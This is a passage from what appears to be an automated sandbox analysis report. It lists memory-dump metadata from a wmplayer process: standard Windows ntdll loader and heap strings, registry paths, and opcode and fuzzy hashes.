            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 45287dbc22a10da2507a01c76850d9daf97477662aa3273d635014b6db924b69
            • Instruction ID: cb0054b3d92d88ebb062ce99be82bf843719ec901fd717cdd5a117496de06d25
            • Opcode Fuzzy Hash: 45287dbc22a10da2507a01c76850d9daf97477662aa3273d635014b6db924b69
            • Instruction Fuzzy Hash: 57B09B719015C5C9DA11F7A04608717790567D0701F69C4E1D3034645E4739C1D5E176
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
            • API String ID: 0-2160512332
            • Opcode ID: d180ebb643bebe04622c3f9d976e3d5dd8a0b4cfc664d30308ea4b2a56b59414
            • Instruction ID: c9fb79fe6cac786a2b8e5783199a299aff21857ba4ab7521bd2c30f6bc4a6dce
            • Opcode Fuzzy Hash: d180ebb643bebe04622c3f9d976e3d5dd8a0b4cfc664d30308ea4b2a56b59414
            • Instruction Fuzzy Hash: AF928B75608746ABD720DEA4C880BABB7F8BB84754F084D9DFA94DB350D770E844CB92
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
            • API String ID: 0-3591852110
            • Opcode ID: 55e912153af230f52bf92d2693c1106344e0f727ce4e86a99135a9ca4a8bc292
            • Instruction ID: 9b605f4a8fa7d8b59a2eeaedf8a4f1308038c465da60f3647eb44ea7fa3d5e22
            • Opcode Fuzzy Hash: 55e912153af230f52bf92d2693c1106344e0f727ce4e86a99135a9ca4a8bc292
            • Instruction Fuzzy Hash: A012BC74604655EFC725CFA8C449BBABBE5FF0A704F1884D9E496CB681E738E881CB50
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
            • API String ID: 0-3532704233
            • Opcode ID: 1af99b6ba4e4d7a1a36ae7ff7518ab936584d6f8338201cea88cc394d9314913
            • Instruction ID: 599b139e1f6914bea06726ce2afabe72f6164afde32a367a0bf8934d952f2ba3
            • Opcode Fuzzy Hash: 1af99b6ba4e4d7a1a36ae7ff7518ab936584d6f8338201cea88cc394d9314913
            • Instruction Fuzzy Hash: 91B1CE715083659FC711DFA8C880A6BBFE8BF84704F0549AEF8A9D7240D774D989CB92
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
            • API String ID: 2994545307-3063724069
            • Opcode ID: c9f1564c925f9fce90b5bf7082112715277ddbdd8c0cca94a4ae39ca245b1824
            • Instruction ID: aac8c23a1b95a431bc2d1788e6f9834bff80ac7dae3e261a99a7adc821c4cc95
            • Opcode Fuzzy Hash: c9f1564c925f9fce90b5bf7082112715277ddbdd8c0cca94a4ae39ca245b1824
            • Instruction Fuzzy Hash: F0D1C072814395AFD721DAE8C840FABB7ECAF84714F0449EDFA94DB250E774C9448B92
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
            • API String ID: 0-1700792311
            • Opcode ID: 10020bd03cbb14eda7a54ba2dae5cec391beae3da0655dea59acfb178b6494c4
            • Instruction ID: f3972ab6122a555f2feedc17d37bdf20521cacc1b90ce15658914ca8e45b6795
            • Opcode Fuzzy Hash: 10020bd03cbb14eda7a54ba2dae5cec391beae3da0655dea59acfb178b6494c4
            • Instruction Fuzzy Hash: 47D1CCB5504785EFCB22DFEAC440AADBBF1FF4A604F088889E455EB252D7B49981CB11
            Strings
            • @, xrefs: 0382D313
            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0382D146
            • @, xrefs: 0382D2AF
            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0382D0CF
            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0382D2C3
            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0382D262
            • Control Panel\Desktop\LanguageConfiguration, xrefs: 0382D196
            • @, xrefs: 0382D0FD
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
            • API String ID: 0-1356375266
            • Opcode ID: 2aed5addc68bd37fd294646e8087038a9a4dbca997706114ccd789d24a7bb2bb
            • Instruction ID: 4d98739f4f027daedb79b0a89a7f65b70ba117ff6fdb191219e4ee39d379a7fe
            • Opcode Fuzzy Hash: 2aed5addc68bd37fd294646e8087038a9a4dbca997706114ccd789d24a7bb2bb
            • Instruction Fuzzy Hash: 5FA18A719083559FD321DFA4C484B5BFBE8BB84715F004DAEE5A8D6280E778D948CB93
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
            • API String ID: 0-523794902
            • Opcode ID: cde719cf0df9a404107fc279bb45bb8d651a2912684d66f56a119d393bede752
            • Instruction ID: 45c601125b1fa07ce6d997f46f7f3db30cdc3a0317b7434775ff1570931b17f7
            • Opcode Fuzzy Hash: cde719cf0df9a404107fc279bb45bb8d651a2912684d66f56a119d393bede752
            • Instruction Fuzzy Hash: 4942FD752083859FC715EFA8C884A2AFBE5FF85208F0849EDE595CB381D734E985CB52
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
            • API String ID: 0-122214566
            • Opcode ID: 0989240330d2a2e1ae20f7427a941ea35e34209c04385bacb3654b9efd32f6c5
            • Instruction ID: 300141ed59f016e043bd6a0ec2ccc6de703499d8a2f47aa16fcbb449c78f9a34
            • Opcode Fuzzy Hash: 0989240330d2a2e1ae20f7427a941ea35e34209c04385bacb3654b9efd32f6c5
            • Instruction Fuzzy Hash: 52C10831A0025DABDF25CBF9C88077EB7A5AF85314F1840E9E885DFA81E7B4D944C391
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
            • API String ID: 0-792281065
            • Opcode ID: 7c64e910dbadfdf58c3f5c6891263bbf695d4ebcc070223b6bf1e037a4a444a6
            • Instruction ID: 6311854383b9c96117011b5153a5246d3501a1668c3649e5bb617a90724edfb3
            • Opcode Fuzzy Hash: 7c64e910dbadfdf58c3f5c6891263bbf695d4ebcc070223b6bf1e037a4a444a6
            • Instruction Fuzzy Hash: 84913731A04B549BEB34EFEDD844BAEB7A4EB41714F1805E8D410EF781E7B49801C791
            Strings
            • Kernel-MUI-Language-Allowed, xrefs: 0385527B
            • WindowsExcludedProcs, xrefs: 0385522A
            • Kernel-MUI-Language-Disallowed, xrefs: 03855352
            • Kernel-MUI-Language-SKU, xrefs: 0385542B
            • Kernel-MUI-Number-Allowed, xrefs: 03855247
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
            • API String ID: 0-258546922
            • Opcode ID: be7ce3016851651fe63c1eef4913f679d60932aed7faaed9657a312a3a6a69ee
            • Instruction ID: c8881468731236dab3c0f7c878631efc9c9966eac8436dcd325f7ad1b4be30a4
            • Opcode Fuzzy Hash: be7ce3016851651fe63c1eef4913f679d60932aed7faaed9657a312a3a6a69ee
            • Instruction Fuzzy Hash: 87F13C76D00218EFCF15DFE8C980AEEBBB9EF49650F15409AE905EB250D7749E01CBA0
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
            • API String ID: 0-1975516107
            • Opcode ID: 3ed076a424539625d5a9f014418438c1ed4b9f24f84d16645ae1d83e39fcea10
            • Instruction ID: c1fb34290ba8be63d16ad3ec2f68057befe603d2b51c2f046e858c68c58cafc7
            • Opcode Fuzzy Hash: 3ed076a424539625d5a9f014418438c1ed4b9f24f84d16645ae1d83e39fcea10
            • Instruction Fuzzy Hash: 7F51DD75A04749DFDB24EFE8C48479DBBB1BB48318F284499EC01EF291D774A889CB81
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
            • API String ID: 0-3178619729
            • Opcode ID: a3c1bf1d9491be15770d7301c83e21add7a24d1d6bb7949d586c3405b032416e
            • Instruction ID: 8b815e310aeae3f98791fa2a65f158279ea05b7e4830fb72ddc1d593a91d7a9c
            • Opcode Fuzzy Hash: a3c1bf1d9491be15770d7301c83e21add7a24d1d6bb7949d586c3405b032416e
            • Instruction Fuzzy Hash: FB139C70A00659DFDB25CFA8C4807A9FBF1BF49304F1881E9E859EBB81D735A945CB90
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
            • API String ID: 2994545307-3570731704
            • Opcode ID: 679a7e841c85b9ed7493aff6c818fd6c9cc3243eb8ed80deafcaf810dbf53a1f
            • Instruction ID: c80a15babd73741442a89e34e84de45f38a01be09ed50ebd0d4d585bcba70acc
            • Opcode Fuzzy Hash: 679a7e841c85b9ed7493aff6c818fd6c9cc3243eb8ed80deafcaf810dbf53a1f
            • Instruction Fuzzy Hash: 7E924975A0022CCFEB25CFA8C844BA9B7B5BF45314F1981EAD949EB640D7349E80CF51
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
            • API String ID: 0-379654539
            • Opcode ID: fd742d8be400844574c48b281356b5a7da3296c4d82b6989a5d490905d4ebaa2
            • Instruction ID: 7c3eaf74c240a45e1a305e0bd1cac37b988ba894ecbec2a4ab80284584cd7aee
            • Opcode Fuzzy Hash: fd742d8be400844574c48b281356b5a7da3296c4d82b6989a5d490905d4ebaa2
            • Instruction Fuzzy Hash: 62C16D7410838A9FD719DF98C044B6AB7E4BF85708F0849AAF8D5CB350E739CA45CB92
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
            • API String ID: 2994545307-336120773
            • Opcode ID: 0b1f6ba465f111d8639401fbdfc92f87f67bc7a86dc7653bb7d816ce3c033529
            • Instruction ID: 95e4e9b07188df4c79b6148d4d11971e06b4c70455c610505b289876ffd5cd80
            • Opcode Fuzzy Hash: 0b1f6ba465f111d8639401fbdfc92f87f67bc7a86dc7653bb7d816ce3c033529
            • Instruction Fuzzy Hash: 4D310176200214EFC752DBE8CC89F6AB7E8EF06664F1800D5F451CB291E670EC80CA66
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
            • API String ID: 2994545307-1391187441
            • Opcode ID: ad046706bdbe24c422725c1f016655107b9b8d4633238d333211eda03610238a
            • Instruction ID: bbec31347abfab640ce93706d2b09145f0dfee5472da1e61b69f1d324131d037
            • Opcode Fuzzy Hash: ad046706bdbe24c422725c1f016655107b9b8d4633238d333211eda03610238a
            • Instruction Fuzzy Hash: F0318336601214EFCB12EBDACC85F9EBBB9EF45620F1440D5E814EB291D774ED80CA61
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: FilterFullPath$UseFilter$\??\
            • API String ID: 0-2779062949
            • Opcode ID: dd37300c7ec4c5c3c06d49c07e4e24424c2295d25b905aa5cde727cf6668d4bb
            • Instruction ID: 7ba8e65e027325a223891a186ec80d599dbff85d2649cfe744fb19d6bf7c83cb
            • Opcode Fuzzy Hash: dd37300c7ec4c5c3c06d49c07e4e24424c2295d25b905aa5cde727cf6668d4bb
            • Instruction Fuzzy Hash: 9BA15B759116299BDB21EFA4CC88BAAF7B8EF44700F1401EAE909EB250D7359EC5CF50
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: %$&$@
            • API String ID: 0-1537733988
            • Opcode ID: ca3c3cb16a9cdd38054cf8734fb0918ae1fa79843b3c2af08b9ef35a9a9ea47c
            • Instruction ID: fff45813672bb968ea57cd1d64587496fe12ff61f9441b6f4fcc5906ddb5da98
            • Opcode Fuzzy Hash: ca3c3cb16a9cdd38054cf8734fb0918ae1fa79843b3c2af08b9ef35a9a9ea47c
            • Instruction Fuzzy Hash: FD71C0745087059FD710DFA8C580A2BFBE9BFC5618F24499DE4AACB291D730D905CB93
            Strings
            • HEAP[%wZ]: , xrefs: 0388E6A6
            • HEAP: , xrefs: 0388E6B3
            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0388E6C6
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
            • API String ID: 0-1340214556
            • Opcode ID: eabf41d5016dba4903c17f01cb6e2ad622e280915a1ed3d041b1428c4531c093
            • Instruction ID: 2cfd87f890987b1ffd98440ea9f76d05b89efea49445ccce6fbe6d03000fb375
            • Opcode Fuzzy Hash: eabf41d5016dba4903c17f01cb6e2ad622e280915a1ed3d041b1428c4531c093
            • Instruction Fuzzy Hash: 0D51C335604758EFD722EBE8C844B6AFBF8AF05304F0800E4EA51DB692D774E950CB11
            Strings
            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 038EC1C5
            • PreferredUILanguages, xrefs: 038EC212
            • @, xrefs: 038EC1F1
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
            • API String ID: 0-2968386058
            • Opcode ID: 915143f233f72c364882597d4938db3b1afcc91e2ed9487ed61a7e6d3b8eebb5
            • Instruction ID: ab3b941811eed4007a2a3b55c844c779ab68e1c44d87d69921d2c224a31cd37b
            • Opcode Fuzzy Hash: 915143f233f72c364882597d4938db3b1afcc91e2ed9487ed61a7e6d3b8eebb5
            • Instruction Fuzzy Hash: EC418076E00209EFDF11DAE8C881FEEBBBDAB05704F1440AAE915F7290D7749A44CB91
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
            • API String ID: 0-1373925480
            • Opcode ID: 14cb81a6fd1b53581f2436cce73ba082136523ff2bb3ae48de0c803ec77b9ab7
            • Instruction ID: 45b8a968ef6840c617b8e779d57ab69def026b59df24218279c6adad6e342058
            • Opcode Fuzzy Hash: 14cb81a6fd1b53581f2436cce73ba082136523ff2bb3ae48de0c803ec77b9ab7
            • Instruction Fuzzy Hash: 3641D0759103888BEB22DBEAC850BADB7B8EF55344F1804DED941EF781DA75C941CB11
            Strings
            • SXS: %s() passed the empty activation context data, xrefs: 038A29FE
            • Actx , xrefs: 038633AC
            • RtlCreateActivationContext, xrefs: 038A29F9
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
            • API String ID: 0-859632880
            • Opcode ID: a0c396724d976abdd7d06099f75ed0dbcb23bbf54f2260fb43b7311b58e9ace1
            • Instruction ID: b1c0e2ab712122ac0b7498834d98fbab40289ac221d53eb43c60685334179a20
            • Opcode Fuzzy Hash: a0c396724d976abdd7d06099f75ed0dbcb23bbf54f2260fb43b7311b58e9ace1
